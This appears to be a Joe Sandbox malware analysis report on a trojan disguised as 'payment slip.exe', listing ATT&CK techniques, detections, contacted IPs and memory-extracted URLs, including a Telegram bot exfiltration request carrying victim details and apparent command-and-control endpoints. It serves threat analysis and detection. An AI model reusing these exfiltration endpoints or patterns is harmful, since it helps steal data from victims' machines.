                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000B1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_000B1806

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts                  		1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job2
                  Valid Accounts                  		1
                  DLL Side-Loading                  		11
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		4
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                  Valid Accounts                  		3
                  Obfuscated Files or Information                  		Security Account Manager1
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		NTDS127
                  System Information Discovery                  		Distributed Component Object Model21
                  Input Capture                  		1
                  Non-Standard Port                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection                  		2
                  Valid Accounts                  		LSA Secrets221
                  Security Software Discovery                  		SSH3
                  Clipboard Data                  		3
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials111
                  Virtualization/Sandbox Evasion                  		VNCGUI Input Capture24
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Access Token Manipulation                  		DCSync2
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                  Process Injection                  		Proc Filesystem11
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  payment slip.exe24%ReversingLabsWin32.Trojan.ShellcodeCrypter
                  payment slip.exe23%VirustotalBrowse
                  payment slip.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  reallyfreegeoip.org0%VirustotalBrowse
                  api.telegram.org2%VirustotalBrowse
                  mail.tradolgt.com1%VirustotalBrowse
                  checkip.dyndns.com0%VirustotalBrowse
                  checkip.dyndns.org0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://checkip.dyndns.org0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  http://crl.m0%URL Reputationsafe
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
                  http://x1.c.lencr.org/00%URL Reputationsafe
                  http://x1.i.lencr.org/00%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  https://reallyfreegeoip.org0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                  https://api.telegram.org0%Avira URL Cloudsafe
                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                  https://www.office.com/0%VirustotalBrowse
                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                  https://www.office.com/0%Avira URL Cloudsafe
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                  https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                  https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                  https://www.office.com/lB0%Avira URL Cloudsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                  https://api.telegram.org/bot0%Avira URL Cloudsafe
                  http://r11.o.lencr.org0#0%Avira URL Cloudsafe
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2031/07/2024%20/%2018:11:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                  https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
                  https://www.office.com/lB0%VirustotalBrowse
                  https://api.telegram.org/bot1%VirustotalBrowse
                  http://varders.kozow.com:80810%Avira URL Cloudsafe
                  http://r11.i.lencr.org/00%Avira URL Cloudsafe
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=0%VirustotalBrowse
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20a0%Avira URL Cloudsafe
                  http://varders.kozow.com:808115%VirustotalBrowse
                  http://aborters.duckdns.org:80810%Avira URL Cloudsafe
                  http://r11.i.lencr.org/00%VirustotalBrowse
                  http://51.38.247.67:8081/_send_.php?L0%Avira URL Cloudsafe
                  http://anotherarmy.dns.army:8081100%Avira URL Cloudmalware
                  https://chrome.google.com/webstore?hl=en0%VirustotalBrowse
                  https://api.telegram.org1%VirustotalBrowse
                  https://chrome.google.com/webstore?hl=enlB0%Avira URL Cloudsafe
                  http://51.38.247.67:8081/_send_.php?L3%VirustotalBrowse
                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%Avira URL Cloudsafe
                  http://aborters.duckdns.org:808112%VirustotalBrowse
                  http://anotherarmy.dns.army:808115%VirustotalBrowse
                  http://mail.tradolgt.com1%VirustotalBrowse
                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		188.114.96.3
                  		truetrueunknown
                  api.telegram.org
                  		149.154.167.220
                  		truetrueunknown
                  mail.tradolgt.com
                  		208.91.199.115
                  		truetrueunknown
                  checkip.dyndns.com
                  		132.226.247.73
                  		truefalseunknown
                  checkip.dyndns.org
                  		unknown
                  		unknowntrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2031/07/2024%20/%2018:11:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://reallyfreegeoip.org/xml/8.46.123.33false
                  • URL Reputation: safe
                  		unknown
                  http://checkip.dyndns.org/false
                  • URL Reputation: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://www.office.com/RegSvcs.exe, 00000002.00000002.3839548945.00000000026E6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.telegram.orgRegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://r11.o.lencr.org0#RegSvcs.exe, 00000002.00000002.3839058817.000000000088C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.telegram.org/botpayment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.office.com/lBRegSvcs.exe, 00000002.00000002.3839548945.00000000026E1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://checkip.dyndns.orgRegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000002.00000002.3839548945.00000000026B5000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.ecosia.org/newtab/RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://varders.kozow.com:8081payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 15%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://r11.i.lencr.org/0RegSvcs.exe, 00000002.00000002.3839058817.000000000088C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20aRegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://aborters.duckdns.org:8081payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 12%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://crl.mRegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://51.38.247.67:8081/_send_.php?LRegSvcs.exe, 00000002.00000002.3839548945.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 3%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://reallyfreegeoip.org/xml/8.46.123.33$RegSvcs.exe, 00000002.00000002.3839548945.00000000025DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.000000000259A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://anotherarmy.dns.army:8081payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 15%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  http://x1.c.lencr.org/0RegSvcs.exe, 00000002.00000002.3839058817.000000000088C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838901959.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://x1.i.lencr.org/0RegSvcs.exe, 00000002.00000002.3839058817.000000000088C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838901959.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://checkip.dyndns.org/qpayment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://chrome.google.com/webstore?hl=enlBRegSvcs.exe, 00000002.00000002.3839548945.00000000026B0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://mail.tradolgt.comRegSvcs.exe, 00000002.00000002.3839548945.0000000002711000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://reallyfreegeoip.orgRegSvcs.exe, 00000002.00000002.3839548945.00000000025DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.000000000256F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedpayment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://reallyfreegeoip.org/xml/payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.000000000256F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  149.154.167.220
                  		api.telegram.orgUnited Kingdom
                  		62041TELEGRAMRUtrue
                  188.114.96.3
                  		reallyfreegeoip.orgEuropean Union
                  		13335CLOUDFLARENETUStrue
                  208.91.199.115
                  		mail.tradolgt.comUnited States
                  		394695PUBLIC-DOMAIN-REGISTRYUStrue
                  132.226.247.73
                  		checkip.dyndns.comUnited States
                  		16989UTMEMUSfalse

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1485149
                  Start date and time:2024-07-31 08:59:14 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 55s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:9
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:payment slip.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@3/4@4/4
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 99%
                  • Number of executed functions: 47
                  • Number of non-executed functions: 297
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  03:00:31API Interceptor11668364x Sleep call for process: RegSvcs.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  149.154.167.220viVOqZjAT0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                    RFQ New Order - 57m#U00b3 LPG SEMI TRAILER 7 NOS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                      e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                        Packing_List.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          Nuevo orden.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            QH098767890000.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              Shipping Documents 2906381504.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                qnOcrxwuiR.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                  PRODUCTS LIST.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    Your_New_Social_Security_Statement.wsfGet hashmaliciousXWormBrowse
                                      188.114.96.3http://memberships.garenna.id.vn/css/hitcount.jspGet hashmaliciousUnknownBrowse
                                      • memberships.garenna.id.vn/images/spin-title.png
                                      PO-00349.xlsGet hashmaliciousRemcosBrowse
                                      • ft.ax/k7B
                                      PO-00349.xlsGet hashmaliciousRemcosBrowse
                                      • ft.ax/k7B
                                      waybill_shipping_documents_original_BL_CI&PL_29_07_2024_000000002024_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                      • hq.ax/
                                      POSH20240605.xlsGet hashmaliciousRemcosBrowse
                                      • wx.ax/Wx8
                                      TT51109240018351.exeGet hashmaliciousFormBookBrowse
                                      • www.globaltrend.xyz/srh8/
                                      4Ad6ei71uD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 429517cm.nyashka.top/pipeprocessorGameLongpollGeneratorWordpressLocalcentral.php
                                      COMANDA BELOR NR13 DIN 240715.xlsGet hashmaliciousRemcosBrowse
                                      • wx.ax/e5E
                                      waybill_shipping_documents_original_BL_CI&PL_29_07_2024_00000000_doc.xlsGet hashmaliciousRemcosBrowse
                                      • tny.wtf/jqfJ
                                      Scan document.xlsGet hashmaliciousUnknownBrowse
                                      • hq.ax/s2K

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      reallyfreegeoip.orgSecuriteInfo.com.Win32.PWSX-gen.23596.1174.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                      • 188.114.97.3
                                      PO.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      cargo detail.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.97.3
                                      Piping Bulk Material Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.97.3
                                      RFQ New Order - 57m#U00b3 LPG SEMI TRAILER 7 NOS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      Packing_List.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      YEN#U0130 S#U0130PAR#U0130#U015e SABO RFQ 2701203-GREECE 10224_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.97.3
                                      Fiyat ve Termin Talebi Hk... 400 adet08.03.2024 0191621#_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      Nuevo orden.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      Arrival Notice.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.97.3
                                      checkip.dyndns.comSecuriteInfo.com.Win32.PWSX-gen.23596.1174.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                      • 193.122.130.0
                                      PO.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 193.122.130.0
                                      PO.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 193.122.6.168
                                      cargo detail.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 193.122.6.168
                                      Piping Bulk Material Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 193.122.130.0
                                      RFQ New Order - 57m#U00b3 LPG SEMI TRAILER 7 NOS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                      • 132.226.8.169
                                      Packing_List.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 193.122.6.168
                                      YEN#U0130 S#U0130PAR#U0130#U015e SABO RFQ 2701203-GREECE 10224_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 158.101.44.242
                                      Fiyat ve Termin Talebi Hk... 400 adet08.03.2024 0191621#_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 193.122.6.168
                                      Nuevo orden.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 132.226.247.73
                                      api.telegram.orgviVOqZjAT0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                      • 149.154.167.220
                                      RFQ New Order - 57m#U00b3 LPG SEMI TRAILER 7 NOS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                      • 149.154.167.220
                                      Packing_List.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      Nuevo orden.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      QH098767890000.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      Shipping Documents 2906381504.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      qnOcrxwuiR.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      PRODUCTS LIST.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      Your_New_Social_Security_Statement.wsfGet hashmaliciousXWormBrowse
                                      • 149.154.167.220

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      TELEGRAMRUviVOqZjAT0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                      • 149.154.167.220
                                      https://claim-zigdao.com/Get hashmaliciousUnknownBrowse
                                      • 149.154.170.96
                                      RFQ New Order - 57m#U00b3 LPG SEMI TRAILER 7 NOS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      e-dekont.exeGet hashmaliciousAgentTeslaBrowse
